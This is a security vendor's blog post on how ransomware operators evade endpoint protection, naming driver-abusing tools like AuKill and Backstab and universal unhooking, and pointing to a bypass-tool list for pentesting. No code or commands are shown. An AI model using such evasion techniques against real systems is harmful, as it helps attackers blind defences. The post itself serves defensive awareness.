Bypassing, Evading and Unhooking Endpoint Security Solutions

Written by
Anthony M. Freed
Published on
May 23, 2023

According to the most recent estimates, nearly half of organizations experienced a ransomware attack in the last year. Ransomware is no longer considered just a technical threat, but rather the largest single risk to any organization.  

Current endpoint protection (EPP) solutions available in the market, while robust and effective against some threats, obviously do not fully protect organizations against ransomware attacks or we would not keep seeing headlines about high-profile attacks daily.  

Why are ransomware attacks so successful? For many reasons, one key aspect being that ransomware operators are implementing advanced security evasion techniques designed to blind or completely circumvent traditional endpoint protection solutions.

Endpoint Security Under Attack

Very recently, there were reports of a new attack tool called AuKill that abuses MS Process Explorer driver to disable Endpoint Detection and Response (EDR) solutions to deploy stealthy backdoors and ultimately deliver ransomware payloads.

Analysis reveals that AuKill bears resemblance to another open-source tool called Backstab used by the LockBit gang that also abuses the MS Process Explorer driver to bypass security solutions. But these are just a fraction of the tools and techniques attackers use to bypass, unhook, or simply blind endpoint protection solutions.  

For example, attackers have long used what are known as “universal unhooking” techniques to hijack execution flow and to deploy a rootkit, then obfuscate subsequent processes and network connections. Universal unhooking blinds endpoint protection tools to the malicious activity, rendering them ineffective for detecting the attack.

Overall, of the top 20 most active ransomware groups, the majority have been observed leveraging one or more bypass and evasions techniques to get around security tools.  

Pentesting Your Endpoint Security

Simply put, ransomware operators and other threat actors are adept at bypassing security controls, and there are numerous examples of hard-coded AV/NGAV/EDR/XDR bypasses written into malicious code that lets attackers slip by without any detections being triggered.  

The following - as provided on GitHub by tkmru, co-founder and CTO of Sterra Security - are just a few of the bypass techniques and tools available to organizations to pentest the efficacy of their endpoint defenses. Additionally, these tools and techniques can be used when conducting internal incident response exercises with the assumption that endpoint controls can and will be bypassed.  

Understanding how and when endpoint security solutions fail, and what steps should be taken post-failure to ensure defense-in-depth and organizational resilience can better prepare organizations for the (almost) inevitable likelihood they will be the target of a ransomware (or other) attack:

Proof-of-Concept Resources:

Bypass and Evasion Tools:

Bypass and Evasion Presentations:

Additional Resources:

And one more – this great presentation discussing insights on EDR inner workings and evasion options from Karsten Nohl and Jorge Gimenez:  

Organizations require both a robust prevention and an agile resilience strategy to defend against today’s more complex ransomware attacks. This includes endpoint protection solutions despite the fact that they can be bypassed or unhooked in certain instances. This is why resilience is key in developing a sound security posture, and organizations can limit the impact of a ransomware payload on operations with resilience planning.

As attackers continue to automate efficiencies in the attack progression to exploit known vulnerabilities for initial access, improve bypass and evasion techniques for stealthy payload delivery, security teams need to better understand where and how their organizations are at risk, and take steps to prepare for the inevitable.

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more. And check out the Recent Ransomware Attacks resource site to get near real-time tracking of ransomware attacks, threat actor groups and their victims.

Subscribe to newsletter

Subscribe to receive the latest blog posts to your inbox every week.

By subscribing you agree to with our Privacy Policy.
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

The Halcyon Platform

Halcyon is the industry’s first dedicated, adaptive security platform focused specifically on stopping ransomware attacks. Halcyon is built by attackers to stop attackers. The solution is a lightweight agent that combines multiple proprietary advanced prevention engines along with AI models trained solely on ransomware.

Interested in getting a demo? Fill out the form and let’s talk!

Get a Demo

Meet with a Halcyon Anti-Ransomware Expert